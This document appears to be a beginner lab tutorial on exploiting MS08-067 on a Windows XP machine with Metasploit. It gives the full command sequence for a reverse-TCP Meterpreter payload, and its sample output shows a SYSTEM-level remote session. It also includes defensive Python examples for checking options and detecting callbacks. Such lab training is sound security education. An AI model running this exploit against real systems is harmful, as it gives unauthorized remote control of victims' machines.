Exploit MS08-067 on a Windows XP Target in Metasploit

Kali Linux, Beginner

Introduction

In this lab, you will learn how to use the Metasploit Framework to exploit one of the best-known Windows vulnerabilities, MS08-067. The flaw is a stack buffer overflow in the path-canonicalization code of the Server service on Windows systems; it is reachable over SMB without authentication and allows remote code execution.

You will use Metasploit, a powerful penetration testing tool, to select, configure, and launch an exploit against a target Windows XP machine. By the end of this lab, you will have gained a Meterpreter session on the target, giving you remote control.

For this lab, the environment is pre-configured with two machines:

  • Your attacker machine (this Ubuntu VM), with IP address 192.168.1.100.
  • A vulnerable Windows XP target machine, with IP address 192.168.1.101.

You will perform all actions from the terminal on your attacker machine.

Select the ms08_067_netapi exploit module

In this step, you will launch the Metasploit console and select the appropriate exploit module for the MS08-067 vulnerability.

First, open a terminal. All commands will be executed here. The Metasploit Framework comes with a command-line interface called msfconsole. Let's start it with the -q (quiet) flag to suppress the banner.

msfconsole -q

Once it loads, you will see the Metasploit prompt, which looks like msf6 >. Now, you can search for the exploit module related to ms08-067.

search ms08-067

You will see a list of matching modules. The one we are interested in is exploit/windows/smb/ms08_067_netapi.

Matching Modules
================

   ##  Name                                 Disclosure Date  Rank       Check  Description
   -  ----                                 ---------------  ----       -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

To use this exploit, type the use command followed by the name of the module.

use exploit/windows/smb/ms08_067_netapi

Your prompt will change to indicate that you are now inside the context of this specific exploit module.

msf6 exploit(windows/smb/ms08_067_netapi) >

Set the RHOSTS option to the Windows XP target

In this step, you will configure the exploit module by setting the target's IP address. A remote exploit has to know which host to attack; in Metasploit, the target address is set with the RHOSTS (Remote Hosts) option.

First, let's view the available options for this exploit using the show options command.

show options

You will see a table of options you can configure. Notice that RHOSTS is required but is not yet set.

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The target port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

...

Now, set the RHOSTS option to the IP address of our Windows XP target, which is 192.168.1.101.

set RHOSTS 192.168.1.101

Metasploit will confirm the change.

RHOSTS => 192.168.1.101

You have now told Metasploit which machine to target.

Select a reverse TCP payload like windows/meterpreter/reverse_tcp

In this step, you will select a payload to be delivered to the target system after a successful exploit. A payload is the code that will run on the target machine. We will use Meterpreter, which is a powerful and flexible payload that provides an interactive shell.

The windows/meterpreter/reverse_tcp payload makes the compromised target open a connection back to you (the attacker) rather than waiting for you to connect to it. This often succeeds where a bind payload would not, because firewalls usually block new inbound connections to the target but allow outbound ones. That same outbound connection is also what network monitoring on the defending side can catch.

To set the payload, use the set payload command.

set payload windows/meterpreter/reverse_tcp

Metasploit will confirm that the payload has been set.

payload => windows/meterpreter/reverse_tcp

Now that the payload is selected, you will need to configure its options in the next step.

Set the LHOST and LPORT payload options

Now that you've selected a reverse payload, you need to configure it to connect back to your machine. This requires setting two main options: LHOST and LPORT.

  • LHOST (Local Host): This is your attacker machine's IP address, where the payload should connect back to.
  • LPORT (Local Port): This is the port on your machine that will listen for the incoming connection from the target.

As mentioned in the introduction, your attacker machine's IP is 192.168.1.100. Let's set LHOST to this value.

set LHOST 192.168.1.100

You will see a confirmation:

LHOST => 192.168.1.100

Next, let's set the listening port. A common choice is 4444.

set LPORT 4444

Again, you will see a confirmation:

LPORT => 4444

You can run show options again to verify that all required options (RHOSTS, LHOST, LPORT) are now correctly set.
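To make that verification mechanical, here is an added Python example (not part of the lab or of Metasploit) that parses a pasted show options listing and reports any option marked required that still has no value. The listing embedded in it is constructed from the tables shown in this lab; the EXITFUNC row and the Exploit target block are included only so the parser sees the shape of a full listing.

```python
"""Flag required options that are still unset in a Metasploit 'show options' listing.

Added example for this lab; it is not part of Metasploit. The listing below is
constructed from the tables shown in the lab (the module table before RHOSTS was
set, the payload table after LHOST and LPORT were set).
"""
import re

SAMPLE_OPTIONS = """\
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The target port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.100    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
"""

# The same listing once RHOSTS has been set (constructed; the replacement keeps
# the same width so the fixed-width columns still line up).
SAMPLE_OPTIONS_READY = SAMPLE_OPTIONS.replace(
    "RHOSTS" + " " * 20, "RHOSTS   192.168.1.101    ")

SECTION_RE = re.compile(r"^(Module|Payload) options \((.+)\):")
COLUMNS = ("Name", "Current Setting", "Required", "Description")


def parse_options(text):
    """Return {'module': {...}, 'payload': {...}} mapping option name to (setting, required).

    The tables are fixed-width, so column boundaries are taken from the header
    line rather than from whitespace: Description contains spaces and Current
    Setting may be empty, which defeats a simple split().
    """
    sections, current, offsets = {}, None, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current, offsets = m.group(1).lower(), None
            sections[current] = {}
            continue
        stripped = line.strip()
        if stripped and not line.startswith(" "):
            current = None          # some other block, e.g. 'Exploit target:'
            continue
        if current is None or not stripped:
            continue
        if offsets is None:
            if stripped.startswith("Name"):
                offsets = [line.index(col) for col in COLUMNS]
            continue
        if stripped.startswith("----"):
            continue
        bounds = offsets + [None]
        name, setting, required, _desc = (
            line[bounds[i]:bounds[i + 1]].strip() for i in range(len(COLUMNS)))
        sections[current][name] = (setting, required.lower() == "yes")
    return sections


def unset_required(sections):
    """List (section, option) pairs that are required but have no value."""
    return [(sec, name)
            for sec, opts in sections.items()
            for name, (setting, required) in opts.items()
            if required and not setting]


if __name__ == "__main__":
    for label, listing in (("before set RHOSTS", SAMPLE_OPTIONS),
                           ("after set RHOSTS", SAMPLE_OPTIONS_READY)):
        missing = unset_required(parse_options(listing))
        print(f"{label}: {'ready' if not missing else 'missing ' + str(missing)}")
```

Run against the first listing it reports RHOSTS as missing; against the second it reports the module as ready. The column offsets come from each table's own header line, so the parser copes with the different Name-column width of the module and payload tables.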

Run the exploit and get a Meterpreter session

With all options configured, you are now ready to launch the exploit. This is the final step where you will attempt to compromise the target system.

To launch the attack, simply use the exploit command.

exploit

Metasploit will now attempt to exploit the vulnerability. If successful, you will see output similar to the following. It will automatically detect the target OS, send the exploit, and then send the payload.

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Automatically detecting the target...
[*] 192.168.1.101:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.101:445 - Selected Target: Windows XP SP3 English (AlwaysOn)
[*] 192.168.1.101:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1035) at 2023-10-27 10:30:00 -0400

meterpreter >

Notice the last line: Meterpreter session 1 opened. Your command prompt has changed to meterpreter >. This means you have successfully compromised the target and have an active session.

To verify your access, run a command like getuid to see what user you are running as on the target system.

getuid

The output shows that you are running as NT AUTHORITY\SYSTEM, the highest privilege level on the machine: the Server service runs as LocalSystem, so the payload injected into it inherits that context.

Server username: NT AUTHORITY\SYSTEM

Congratulations, you have successfully exploited MS08-067!
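The handler output above is the attacker's view of the session. Seen from the network, the same event is an inbound connection to the target's SMB port followed seconds later by the target opening a new connection back to that peer on port 4444. The following added Python example (not part of the lab or of Metasploit) runs that detection over constructed flow records that mirror this lab's addresses and timestamps; the record format, the one-minute window and the sample lines are assumptions made for the example.

```python
"""Detect a reverse-TCP callback that follows inbound SMB traffic in connection logs.

Added example for this lab, not part of Metasploit. The records below are
constructed to mirror what the lab's exploit would leave in a firewall or
NetFlow log: the attacker (192.168.1.100) connects to the target's SMB port,
and moments later the target (192.168.1.101) connects back to 192.168.1.100:4444.
"""
from collections import namedtuple
from datetime import datetime, timedelta

Flow = namedtuple("Flow", "ts src sport dst dport proto")

# Constructed sample, one record per new TCP connection:
# timestamp  src  sport  dst  dport  proto   (text after '#' is a comment)
SAMPLE_FLOWS = """\
2023-10-27T10:29:58 192.168.1.100 39122 192.168.1.101 445  tcp  # exploit delivered over SMB
2023-10-27T10:30:00 192.168.1.101 1035  192.168.1.100 4444 tcp  # target calls back to the handler
2023-10-27T10:31:10 192.168.1.101 1040  192.168.1.50  80   tcp  # ordinary web request from the target
2023-10-27T10:35:00 192.168.1.20  50000 192.168.1.101 445  tcp  # normal file-share use, no callback
"""


def parse_flows(text):
    """Parse the whitespace-separated flow records into Flow tuples."""
    flows = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ts, src, sport, dst, dport, proto = line.split()
        flows.append(Flow(datetime.fromisoformat(ts), src, int(sport),
                          dst, int(dport), proto.lower()))
    return flows


def detect_reverse_callbacks(flows, window=timedelta(seconds=60),
                             service_ports=frozenset({445})):
    """Return alerts for hosts that accept an SMB connection from a peer and then
    open a new outbound connection back to that same peer within `window`.

    A file server answering on 445 has no reason to initiate connections to
    its client; a reverse_tcp payload does exactly that, so the pattern is a
    strong signal whatever callback port was chosen.
    """
    last_inbound = {}   # (server, client) -> time of the latest inbound SMB connection
    alerts = []
    for f in sorted(flows, key=lambda f: f.ts):
        if f.proto != "tcp":
            continue
        if f.dport in service_ports:
            last_inbound[(f.dst, f.src)] = f.ts
            continue
        seen = last_inbound.get((f.src, f.dst))
        if seen is not None and f.ts - seen <= window:
            alerts.append({
                "victim": f.src,
                "peer": f.dst,
                "callback_port": f.dport,
                "smb_at": seen.isoformat(),
                "callback_at": f.ts.isoformat(),
                "delay_s": (f.ts - seen).total_seconds(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_reverse_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"[!] {alert['victim']} connected back to "
              f"{alert['peer']}:{alert['callback_port']} "
              f"{alert['delay_s']:.0f}s after accepting SMB from it")
```

On the sample it raises exactly one alert, for 192.168.1.101 calling back to 192.168.1.100:4444 two seconds after the SMB connection; the target's later web request and the unrelated file-share access do not match. The detector keys on direction, not port number, so changing LPORT away from 4444 would not evade it; in production you would add an allow-list of peers (domain controllers, management hosts) that legitimately receive connections from file servers.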

Summary

In this lab, you successfully used the Metasploit Framework to exploit the MS08-067 vulnerability on a Windows XP target.

You followed the fundamental workflow of a penetration test:

  1. Selected a specific exploit module (exploit/windows/smb/ms08_067_netapi).
  2. Configured the exploit by setting the target's address (RHOSTS).
  3. Chose a payload (windows/meterpreter/reverse_tcp) to gain control.
  4. Configured the payload with your local host and port (LHOST, LPORT).
  5. Launched the exploit and gained a high-privilege Meterpreter session on the target.

This exercise demonstrates the power and simplicity of using a framework like Metasploit to test for and exploit system vulnerabilities.